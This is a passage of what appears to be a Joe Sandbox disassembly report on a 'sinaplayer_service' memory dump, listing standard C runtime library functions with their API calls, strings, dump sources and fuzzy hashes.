                                                                                                                                                                                                    • API ID: _errno$_invalid_parameter_noinfo$_wmemsetmemcpy
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1830569105-0
                                                                                                                                                                                                    • Opcode ID: d466e86d94f8c8e3f76ff28f24f5c7603f8faac23cd4054913c42b66cff7b720
                                                                                                                                                                                                    • Instruction ID: 5acee1a4270a26189e02dcf1116dd50d039a731869b7fc5face44ccb2a293ccb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d466e86d94f8c8e3f76ff28f24f5c7603f8faac23cd4054913c42b66cff7b720
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D901D871798719ABF722AE689C00F9F376C9F45B24F41841BFA04AF240D7B1D8509BE6
                                                                                                                                                                                                    Function 6D0A9555 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9571
                                                                                                                                                                                                    • wcslen.MSVCR120(00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A9580
                                                                                                                                                                                                    • _wcsnicoll.MSVCR120(00000000,00000000,00000000,?,00000000,?,6D0A96C4,?,?,?,?,6D0A96E8,0000000C), ref: 6D0A959D
                                                                                                                                                                                                    • ___crtGetEnvironmentStringsW.LIBCMT ref: 6D0A9D9E
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcslen$EnvironmentStrings___crt_wcsnicoll
                                                                                                                                                                                                    • String ID: *\
                                                                                                                                                                                                    • API String ID: 2626493194-3401207301
                                                                                                                                                                                                    • Opcode ID: 745abadbf62e84239558564cd3e20a5faf12661227a2ed881c20564f6e3b8a42
                                                                                                                                                                                                    • Instruction ID: e00cd9744cef41538d027dac3588cca3d72615d4788743db3918d9b6ba2c19da
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 745abadbf62e84239558564cd3e20a5faf12661227a2ed881c20564f6e3b8a42
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C001C472B082119BFF155EF9F441B5937E8AE01754B9D442AEA188B212EB73D98087D0
                                                                                                                                                                                                    Function 6D0A44FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetNumaHighestNodeNumber.KERNEL32(?,?,6D0A5034,E18D5491,?,00000180,?), ref: 6D0A4509
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6D15CF40,?,?,?,?,?,?,6D0A6C5D), ref: 6D0D20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6D15CF40,00000000,?,?,?,?,?,6D0A6C5D), ref: 6D0D20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Version@$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConcurrency@@ErrorExceptionHighestLastManager@1@NodeNumaNumberResourceThrow
                                                                                                                                                                                                    • String ID: ]lm
                                                                                                                                                                                                    • API String ID: 2376245552-2416103240
                                                                                                                                                                                                    • Opcode ID: 160d327d64e8dbeca74b2d17a431e86a1ba45ae4c8a22db0a3cddcd27176e08e
                                                                                                                                                                                                    • Instruction ID: 791d0e8ee6bad14dfcdb5ce1df6b2435af204d28f171746a6e94710cda0203af
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 160d327d64e8dbeca74b2d17a431e86a1ba45ae4c8a22db0a3cddcd27176e08e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00012B79A04219ABFB20DAF6AC44B7F7BECEB452507140152FE04D7145DB21C910C6F1
                                                                                                                                                                                                    Function 6D0AAACE Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Name::operator+$NameName::
                                                                                                                                                                                                    • String ID: throw(
                                                                                                                                                                                                    • API String ID: 168861036-3159766648
                                                                                                                                                                                                    • Opcode ID: 1540b233fa845c94f2cfe36d76455ef5f533daed5b52c88c6c7fd5570c0eb26e
                                                                                                                                                                                                    • Instruction ID: 447e3b5f83dbc3d75e661f4c2f2baacb49b24c6ccf58e6c8ffd89e3fefab856a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1540b233fa845c94f2cfe36d76455ef5f533daed5b52c88c6c7fd5570c0eb26e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90018031554309AFEF04CFE8CC51FFE3BB9AB45344F44405AE6099B191DB74AA448B90
                                                                                                                                                                                                    Function 6D0B201F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __wcenvarg.LIBCMT ref: 6D0B2048
                                                                                                                                                                                                      • Part of subcall function 6D0B1E4B: wcslen.MSVCR120(00000000,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?,?), ref: 6D0B1EA4
                                                                                                                                                                                                      • Part of subcall function 6D0B1E4B: _calloc_crt.MSVCR120(00000002,00000002,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?), ref: 6D0B1EBC
                                                                                                                                                                                                      • Part of subcall function 6D0B1E4B: _wdupenv_s.MSVCR120(?,00000000,?,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000), ref: 6D0B1EDB
                                                                                                                                                                                                      • Part of subcall function 6D0B1E4B: wcslen.MSVCR120(?,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?,?), ref: 6D0B1EEF
                                                                                                                                                                                                      • Part of subcall function 6D0B1E4B: wcslen.MSVCR120(?,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000,?,?), ref: 6D0B1F03
                                                                                                                                                                                                      • Part of subcall function 6D0B1E4B: wcscpy_s.MSVCR120(00000000,?,00000000,?,00000000,00000000,?,?,?,Lm,6D0B204D,?,Lm,00000000,?,00000000), ref: 6D0B1F3B
                                                                                                                                                                                                    • free.MSVCR120(000000FF,?,00000000,000000FF,?,6D0D4CE2), ref: 6D0B2069
                                                                                                                                                                                                      • Part of subcall function 6D08ECE0: HeapFree.KERNEL32(00000000,00000000,?,6D0D3D3A,00000000,6D091782,6D0FB407,?,6D0FBD2C,00000003,6D0D3BC7,6D094630,00000008,6D0AC625,?), ref: 6D08ECF4
                                                                                                                                                                                                    • free.MSVCR120(?,000000FF,?,00000000,000000FF,?,6D0D4CE2), ref: 6D0B2071
                                                                                                                                                                                                    • _errno.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0D4D10
                                                                                                                                                                                                    • _invalid_parameter_noinfo.MSVCR120(00000000,00000000,00000000,00000000,00000000), ref: 6D0D4D1B
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wcslen$free$FreeHeap__wcenvarg_calloc_crt_errno_invalid_parameter_noinfo_wdupenv_swcscpy_s
                                                                                                                                                                                                    • String ID: Lm
                                                                                                                                                                                                    • API String ID: 1355187257-3564246650
                                                                                                                                                                                                    • Opcode ID: 76bf5bb4073fa13d9f8f257364d9b8be033e431d19ac16dc88059f4c09db1408
                                                                                                                                                                                                    • Instruction ID: acbd46e300641175c0b6ee87c7ce3f312cc04aa2ab46f915e0857999803e3b06
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76bf5bb4073fa13d9f8f257364d9b8be033e431d19ac16dc88059f4c09db1408
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F06D32818119BBEF125FA4DC01BDE3769FF06324F114652FD24961A1D7739A20DBE1
                                                                                                                                                                                                    Function 6D0AC754 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _malloc_crt.MSVCR120(?), ref: 6D0AC770
                                                                                                                                                                                                      • Part of subcall function 6D092226: malloc.MSVCR120(6D0FC0AD,6D163B90,6D163B90,?,?,6D0FC0AD,?,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 6D092237
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?,00000001), ref: 6D0D3AB3
                                                                                                                                                                                                    • std::exception::exception.LIBCMT(?), ref: 6D0D3AD4
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(6D0E176C,6D15CE18,?), ref: 6D0D3AE9
                                                                                                                                                                                                    • free.MSVCR120(00000000), ref: 6D0D3AF0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • _DebugMallocator<T>::allocate() - Integer overflow., xrefs: 6D0D3AC9
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: std::exception::exception$ExceptionThrow_malloc_crtfreemalloc
                                                                                                                                                                                                    • String ID: _DebugMallocator<T>::allocate() - Integer overflow.
                                                                                                                                                                                                    • API String ID: 845836463-3293063709
                                                                                                                                                                                                    • Opcode ID: 6a4dfd689e4e56529583a6cfd0ec128a6c4862b63068e50e6c0d11e0993cdfa7
                                                                                                                                                                                                    • Instruction ID: 282b801a3d7efb9a5428363ab3d769edcb129dacac0648640ad840ee40bf0749
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a4dfd689e4e56529583a6cfd0ec128a6c4862b63068e50e6c0d11e0993cdfa7
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94F0F47591830C7AFB00EFA4D885BDE3B6CAB00244B51C166E910EB141DB30C244CA92
                                                                                                                                                                                                    Function 6D099AB6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _FindAndUnlinkFrame.MSVCR120(?,6D0999B8,00000000), ref: 6D099ABF
                                                                                                                                                                                                      • Part of subcall function 6D099A8D: _getptd.MSVCR120(?,?,6D099AC4,?,6D0999B8,00000000), ref: 6D099A91
                                                                                                                                                                                                      • Part of subcall function 6D099A8D: _getptd.MSVCR120(?,?,6D099AC4,?,6D0999B8,00000000), ref: 6D099AA5
                                                                                                                                                                                                    • _getptd.MSVCR120(6D0999B8,00000000), ref: 6D099AC5
                                                                                                                                                                                                    • _getptd.MSVCR120(6D0999B8,00000000), ref: 6D099AD3
                                                                                                                                                                                                    • _IsExceptionObjectToBeDestroyed.MSVCR120(00000000), ref: 6D099B14
                                                                                                                                                                                                      • Part of subcall function 6D099364: _getptd.MSVCR120 ref: 6D099367
                                                                                                                                                                                                    • __DestructExceptionObject.MSVCR120(?,00000000), ref: 6D099B22
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 473968603-1018135373
                                                                                                                                                                                                    • Opcode ID: c69c183f2a0aeb567c3bf67c87643f11215e2007519679327255a15a990112a2
                                                                                                                                                                                                    • Instruction ID: c6c29cf5bd305bacb5b50d76c7074fdb12208d2b431b77924ae133aa7cf45b4d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c69c183f2a0aeb567c3bf67c87643f11215e2007519679327255a15a990112a2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B016575C08306CEEB248F20E600B6EB7B2FF54212F25742DD42A1B650DB35D985EA81
                                                                                                                                                                                                    Function 6D0FC9A7 Relevance: 10.5, APIs: 7, Instructions: 31threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120 ref: 6D0FC9AA
                                                                                                                                                                                                    • __crtFlsGetValue.MSVCR120(00000000), ref: 6D0FC9B0
                                                                                                                                                                                                    • __get_tlsindex.MSVCR120(?), ref: 6D0FC9BF
                                                                                                                                                                                                    • __crtFlsSetValue.MSVCR120(00000000,?), ref: 6D0FC9C5
                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 6D0FC9D0
                                                                                                                                                                                                    • ExitThread.KERNEL32 ref: 6D0FC9D7
                                                                                                                                                                                                    • _freefls.MSVCR120(?), ref: 6D0FC9F3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Value__crt__get_tlsindex$ErrorExitLastThread_freefls
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 415173470-0
                                                                                                                                                                                                    • Opcode ID: 8dea7111423c6fd501616c7bb004128d3cf57c720cf87c205ba9aa0b8a6a3005
                                                                                                                                                                                                    • Instruction ID: 4df216c99f384ed19b7e37262c734e8b0213706c83e3b068d3bc8494c9d553c1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8dea7111423c6fd501616c7bb004128d3cf57c720cf87c205ba9aa0b8a6a3005
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0897450C2069FF7089FB4D54971D7BF9BF052483358459E908CB206DB35D841CB94
                                                                                                                                                                                                    Function 6D0FC9FE Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,6D0D3F45,?), ref: 6D0FCA18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0FCA1F
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6D0FCA2B
                                                                                                                                                                                                    • DecodePointer.KERNEL32(00000001,6D0D3F45,?), ref: 6D0FCA48
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoInitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-340411864
                                                                                                                                                                                                    • Opcode ID: a44f5c743e7e11b3f3d5040aad8ee6113b3db643c6b39291c29f79826dc894d3
                                                                                                                                                                                                    • Instruction ID: 1fd486dd3f1d7b9d155a97034f8150544303bf8c146724fb969b75e299cee2fc
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a44f5c743e7e11b3f3d5040aad8ee6113b3db643c6b39291c29f79826dc894d3
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6E01274568281ABFF149FB4FE0EB783AB8B74670AF540021F107D9086DFF4D00AAA48
                                                                                                                                                                                                    Function 6D11E164 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 21COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd
                                                                                                                                                                                                    • String ID: MOC$RCC$csm
                                                                                                                                                                                                    • API String ID: 3186804695-2671469338
                                                                                                                                                                                                    • Opcode ID: 4baa1040828cfe797551a8c501a7ba5fca23831defe1c63595536794fd8fcb59
                                                                                                                                                                                                    • Instruction ID: 66910116821ea8ba1f29059b2a20830cd04b6d65b8e036e0ea63572909a234c3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4baa1040828cfe797551a8c501a7ba5fca23831defe1c63595536794fd8fcb59
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0757451C205CEEB019BB4C9057683AA8BF59319F4644F1D5188B626D7B89A80CA62
                                                                                                                                                                                                    Function 6D0FCA56 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,6D0D3F0C), ref: 6D0FCA70
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6D0FCA77
                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000), ref: 6D0FCA82
                                                                                                                                                                                                    • DecodePointer.KERNEL32(6D0D3F0C), ref: 6D0FCA9D
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000013.00000002.3393454927.000000006D081000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6D080000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393389915.000000006D080000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393702289.000000006D15F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393772014.000000006D162000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393905653.000000006D165000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3393972825.000000006D166000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000013.00000002.3394063578.000000006D167000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_6d080000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                                                                    • String ID: RoUninitialize$combase.dll
                                                                                                                                                                                                    • API String ID: 3489934621-2819208100
                                                                                                                                                                                                    • Opcode ID: 25bc1d36d514f94d0aea3981f224d8629c35ed538c7cbacb180d851655a5a02e
                                                                                                                                                                                                    • Instruction ID: e14f9fa6eacf0430fcefb854bb20e9157c9f7b0567f6a9002e3f0c43a1bab7d4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25bc1d36d514f94d0aea3981f224d8629c35ed538c7cbacb180d851655a5a02e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CE09274944281ABFF549FA5F84DB383AB8A706306F258015F546E5186CBF4D04AEF54
                                                                                                                                                                                                    Function 6D150162 Relevance: 9.2, APIs: 6, Instructions: 182COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _dtest.MSVCR120(?,?,?,?,?,?,?,?,?,6D150120), ref: 6D15016F
                                                                                                                                                                                                    • _dtest.MSVCR120(?,?,?,?,?,?,?,?,?,?,6D150120), ref: 6D15017B
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D1501F7
                                                                                                                                                                                                    • __Dunscale.LIBCPMT ref: 6D150210
                                                                                                                                                                                                    • __dscale.LIBCMT ref: 6D15026D
                                                                                                                                                                                                    • __fperrraise.LIBCMT ref: 6D150304
